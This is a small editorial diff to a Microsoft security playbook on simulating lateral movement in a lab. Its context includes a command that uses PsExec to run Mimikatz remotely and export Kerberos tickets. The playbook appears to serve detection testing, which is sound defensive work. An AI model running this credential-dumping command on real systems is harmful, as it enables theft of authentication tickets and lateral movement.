MicrosoftDocs/ATADocs/ATPDocs/atp-playbook-lateral-movement.md

 ### Mimikatz sekurlsa::tickets

-With Mimikatz staged on AdminPC, we will use PsExec to remotely execute it.
+With Mimikatz staged on AdminPC, we'll use PsExec to remotely execute it.

-1. Traverse to where PsExec is located and execute the following:
+1. Traverse to where PsExec is located and execute the following command:

    ``` cmd
    PsExec.exe \\AdminPC -accepteula cmd /c (cd c:\temp ^& mimikatz.exe "privilege::debug" "sekurlsa::tickets /export" "exit")